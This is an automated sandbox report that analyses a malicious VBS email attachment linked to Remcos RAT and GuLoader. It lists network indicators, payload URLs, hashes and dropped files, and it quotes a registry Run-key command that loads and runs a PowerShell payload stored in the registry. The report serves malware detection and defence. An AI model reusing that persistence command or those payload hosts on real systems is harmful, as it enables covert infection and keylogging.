                                                  185.157.163.135
                                                  unknownSweden
                                                  197595OBE-EUROPEObenetworkEuropeSEtrue
                                                  192.185.113.96
                                                  totoplast.comUnited States
                                                  46606UNIFIEDLAYER-AS-1USfalse
                                                  178.237.33.50
                                                  geoplugin.netNetherlands
                                                  8455ATOM86-ASATOM86NLfalse
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1538692
                                                  Start date and time:2024-10-21 17:04:12 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 9m 28s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:22
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:Order_MG2027176.vbs
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.expl.evad.winVBS@24/13@6/3
                                                  EGA Information:
                                                  • Successful, ratio: 66.7%
                                                  HCA Information:
                                                  • Successful, ratio: 95%
                                                  • Number of executed functions: 170
                                                  • Number of non-executed functions: 276
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .vbs
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                  • Excluded IPs from analysis (whitelisted): 93.184.221.240
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target powershell.exe, PID 5308 because it is empty
                                                  • Execution Graph export aborted for target powershell.exe, PID 5976 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: Order_MG2027176.vbs
                                                  TimeTypeDescription
                                                  11:05:20API Interceptor1x Sleep call for process: wscript.exe modified
                                                  11:05:23API Interceptor86x Sleep call for process: powershell.exe modified
                                                  11:06:26API Interceptor829811x Sleep call for process: msiexec.exe modified
                                                  17:05:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Leavy %Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)
                                                  17:06:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Leavy %Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  192.185.113.96swift.factura.pago.01.03.2022.vbsGet hashmaliciousUnknownBrowse
                                                  • www.js-hurling.com/blender/Aipxebuildcs.doc
                                                  swift.factura.pago.01.03.2022.vbsGet hashmaliciousUnknownBrowse
                                                  • www.js-hurling.com/blender/Aipxebuildcs.doc
                                                  txq08L18GI.docGet hashmaliciousAsyncRATBrowse
                                                  • www.js-hurling.com/asyiujn/Fkdwuy.bin
                                                  CEblvYFBiV.exeGet hashmaliciousQuasarBrowse
                                                  • www.js-hurling.com/ortylh/update.png
                                                  swift.fatura.01.04.2022.pdf.vbsGet hashmaliciousQuasarBrowse
                                                  • www.js-hurling.com/ortylh/update.png
                                                  z45ww3P0eH.exeGet hashmaliciousQuasarBrowse
                                                  • www.js-hurling.com/bstylh/ConsoleApp3.jpeg
                                                  Pago.xlsGet hashmaliciousQuasarBrowse
                                                  • www.js-hurling.com/bstylh/ConsoleApp3.jpeg
                                                  Pago.xlsGet hashmaliciousQuasarBrowse
                                                  • www.js-hurling.com/bstylh/ConsoleApp273.png
                                                  Pago.Diciembre.xlsGet hashmaliciousQuasarBrowse
                                                  • www.js-hurling.com/astylh/ConsoleApp2.png
                                                  Comprobante.de.Pago.xlsGet hashmaliciousQuasarBrowse
                                                  • www.js-hurling.com/komllh/ConsoleApp5.bin
                                                  178.237.33.50Order.vbsGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • geoplugin.net/json.gp
                                                  1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  duEsmKBlGr.exeGet hashmaliciousUnknownBrowse
                                                  • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                  lA0Z0vjXfA.exeGet hashmaliciousUnknownBrowse
                                                  • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                  172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • geoplugin.net/json.gp
                                                  SecuriteInfo.com.Variant.Ulise.323893.7366.1016.exeGet hashmaliciousUnknownBrowse
                                                  • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                  Ibnh3BCQSQ.exeGet hashmaliciousUnknownBrowse
                                                  • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                  nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  geoplugin.netOrder.vbsGet hashmaliciousRemcosBrowse
                                                  • 178.237.33.50
                                                  rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 178.237.33.50
                                                  1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                  • 178.237.33.50
                                                  172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                  • 178.237.33.50
                                                  SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 178.237.33.50
                                                  nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • 178.237.33.50
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  UNIFIEDLAYER-AS-1USB0044054.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 192.185.113.96
                                                  https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2F28KOjymVGMvsdxoOV3okyunn/S0pvbmVzQGtvbmlhZy1ncy5jb20=Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                  • 67.20.76.226
                                                  https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2FCGJiV2TYiHhEjaWZAqcgtold/S0pvbmVzQGtvbmlhZy1ncy5jb20=Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                  • 67.20.76.226
                                                  https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2FQVUPgqjgXFIkJFnzej6vlwSU/RENhcm5vdnNreUBrb25pYWctZ3MuY29tGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                  • 67.20.76.226
                                                  https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2Fn8shpNHR5esID4MN5V6n2I56/RENhcm5vdnNreUBrb25pYWctZ3MuY29tGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                  • 67.20.76.226
                                                  https://www.childkorea.or.kr/bbs/link.html?code=alarm&number=3064&url=https://form.jotform.com/242923371946059Get hashmaliciousHTMLPhisherBrowse
                                                  • 108.179.193.188
                                                  Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 192.185.13.234
                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                  • 162.240.133.181
                                                  arm4.elfGet hashmaliciousUnknownBrowse
                                                  • 74.91.244.57
                                                  la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                  • 98.131.252.189
                                                  ATOM86-ASATOM86NLOrder.vbsGet hashmaliciousRemcosBrowse
                                                  • 178.237.33.50
                                                  rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 178.237.33.50
                                                  1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                  • 178.237.33.50
                                                  duEsmKBlGr.exeGet hashmaliciousUnknownBrowse
                                                  • 178.237.33.50
                                                  lA0Z0vjXfA.exeGet hashmaliciousUnknownBrowse
                                                  • 178.237.33.50
                                                  172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                  • 178.237.33.50
                                                  SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 178.237.33.50
                                                  SecuriteInfo.com.Variant.Ulise.323893.7366.1016.exeGet hashmaliciousUnknownBrowse
                                                  • 178.237.33.50
                                                  Ibnh3BCQSQ.exeGet hashmaliciousUnknownBrowse
                                                  • 178.237.33.50
                                                  nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • 178.237.33.50
                                                  OBE-EUROPEObenetworkEuropeSESKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 193.187.91.216
                                                  SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 193.187.91.216
                                                  XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                  • 194.32.149.14
                                                  bot_library.exeGet hashmaliciousUnknownBrowse
                                                  • 193.182.111.131
                                                  z2PO20240815.pdf.lnkGet hashmaliciousXWormBrowse
                                                  • 193.187.91.208
                                                  SecuriteInfo.com.Win32.PWSX-gen.24212.14364.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                  • 193.187.91.216
                                                  https://www.canva.com/design/DAGLxvJi_b4/I2I9hVBC94poYJRY8neUTg/view?utm_content=DAGLxvJi_b4&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                  • 194.32.144.119
                                                  REV-New Order 20240717^^^^^^^^^^^^^^^^^^.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                  • 193.187.91.208
                                                  REV-New Order 20240717.pif.exeGet hashmaliciousRemcosBrowse
                                                  • 193.187.91.124
                                                  SecuriteInfo.com.AutoIt.Injector-JY.190.10007.exeGet hashmaliciousUnknownBrowse
                                                  • 193.182.111.41
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  3b5074b1b5d032e5620f69f9f700ff0eOrder.vbsGet hashmaliciousRemcosBrowse
                                                  • 192.185.113.96
                                                  index.htmlGet hashmaliciousUnknownBrowse
                                                  • 192.185.113.96
                                                  Ricevuta_di_pagamento.vbsGet hashmaliciousGuLoaderBrowse
                                                  • 192.185.113.96
                                                  https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2F28KOjymVGMvsdxoOV3okyunn/S0pvbmVzQGtvbmlhZy1ncy5jb20=Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                  • 192.185.113.96
                                                  https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2Fn8shpNHR5esID4MN5V6n2I56/RENhcm5vdnNreUBrb25pYWctZ3MuY29tGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                  • 192.185.113.96
                                                  index.htmlGet hashmaliciousUnknownBrowse
                                                  • 192.185.113.96
                                                  TENDER ADDENDUM NO. 01.vbsGet hashmaliciousGuLoaderBrowse
                                                  • 192.185.113.96
                                                  IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 192.185.113.96
                                                  RFQ 1307.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 192.185.113.96
                                                  Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbsGet hashmaliciousGuLoaderBrowse
                                                  • 192.185.113.96
                                                  37f463bf4616ecd445d4a1937da06e19Ricevuta_di_pagamento.vbsGet hashmaliciousGuLoaderBrowse
                                                  • 192.185.113.96
                                                  8VYDvQtXBH.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                  • 192.185.113.96
                                                  proforma.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 192.185.113.96
                                                  IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 192.185.113.96
                                                  file.exeGet hashmaliciousUnknownBrowse
                                                  • 192.185.113.96
                                                  FACTURA RAGOZA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 192.185.113.96
                                                  Spedizione.vbsGet hashmaliciousUnknownBrowse
                                                  • 192.185.113.96
                                                  FACTURA DE PAGO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 192.185.113.96
                                                  PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 192.185.113.96
                                                  rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 192.185.113.96
                                                  No context
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):288
                                                  Entropy (8bit):3.309975031194062
                                                  Encrypted:false
                                                  SSDEEP:6:6lj8FwlNQZU5YcIeeDAlOWAAe5q1gWAAe5q1gWAv:6lYifsUec0WFe5BWFe5BW+
                                                  MD5:54CE11A24E8108D82C2D0A71B4735297
                                                  SHA1:2C8D01FBEBC0BA7149A513E1ADBDD6C507A81477
                                                  SHA-256:F59429F5DA89993CB505096D3BBA4EDB26EA86EA144B0532DB7E7E0E7F22E65B
                                                  SHA-512:66593E3C3A501983A6804D9C83A61449611503F4D128D09F8F01E2C4633ACD751A5939FA3EA900D56AA38DA998B3430E720BEABBBBB9733C86EC86C83CBF5D26
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                  Preview:....[.2.0.2.4./.1.0./.2.1. .1.1.:.0.5.:.5.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                  Process:C:\Windows\System32\wscript.exe
                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                  Category:dropped
                                                  Size (bytes):71954
                                                  Entropy (8bit):7.996617769952133
                                                  Encrypted:true
                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                  Malicious:false
                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                  Process:C:\Windows\System32\wscript.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):328
                                                  Entropy (8bit):3.1318914769396753
                                                  Encrypted:false
                                                  SSDEEP:6:kKmn9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:XDnLNkPlE99SNxAhUe/3
                                                  MD5:F8F4E0F1116D0C8BAF1DA2E4213696E0
                                                  SHA1:2CC31C4AA715F4C0ABBDCBD97747C797EE183EE8
                                                  SHA-256:78A1C875A6552090782BAC1842C259FAAEE7FACDE9288BD6B5D3C22813B266EA
                                                  SHA-512:6839D7AFDCDB8BDFB809DC83DB50BB21970D35BFE0D07829E8D8401C78C0936EA35EE9EF2488C9742C7CE848A61180ED0C67DFC8E2F27ADEBA4F5A69DAABC730
                                                  Malicious:false
                                                  Preview:p...... ........`r:..#..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):960
                                                  Entropy (8bit):5.007342357625525
                                                  Encrypted:false
                                                  SSDEEP:12:tkhEVBnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwc:qhEV1dVauKyGX85jvXhNlT3/73clHWro
                                                  MD5:2384C8ED5D39845A7043C8E4AF84F3F2
                                                  SHA1:1A4A72CFF979CDD293034EFDFB35F0C6FA3ABD75
                                                  SHA-256:AFB89F4CFEB681642FBADDAFE06E6BFAA298850FDA6771E80BA97B8A79527465
                                                  SHA-512:387793D3C3700EFA89D4197DFB11FC667C63C6416068DCC2751953FE6C6EEAA4F2534D32F2F8E9EBB2F5119229BDADB173985E6EF106EFFF71180441197F7291
                                                  Malicious:false
                                                  Preview:{. "geoplugin_request":"216.52.183.150",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7157",. "geoplugin_longitude":"-74",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):8003
                                                  Entropy (8bit):4.840877972214509
                                                  Encrypted:false
                                                  SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                  MD5:106D01F562D751E62B702803895E93E0
                                                  SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                  SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                  SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                  Malicious:false
                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):1.1940658735648508
                                                  Encrypted:false
                                                  SSDEEP:3:Nlllulbnolz:NllUc
                                                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                  Malicious:false
                                                  Preview:@...e................................................@..........
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7d065266, page size 32768, DirtyShutdown, Windows version 10.0
                                                  Category:dropped
                                                  Size (bytes):15728640
                                                  Entropy (8bit):0.9501033970057068
                                                  Encrypted:false
                                                  SSDEEP:12288:Q8CS8rYTkTaTeUZT+T5SFnTKXpUlvV7j:Q8/TGM
                                                  MD5:783AFE6891113AC761A53926EDD919FB
                                                  SHA1:0EB7D48B9CEBD2C3D181D174A180A4B333DE0927
                                                  SHA-256:900A7A65C79BF5C0730F574D5E93B0C452E9DFDE7EE34D03CD883556A7A6D789
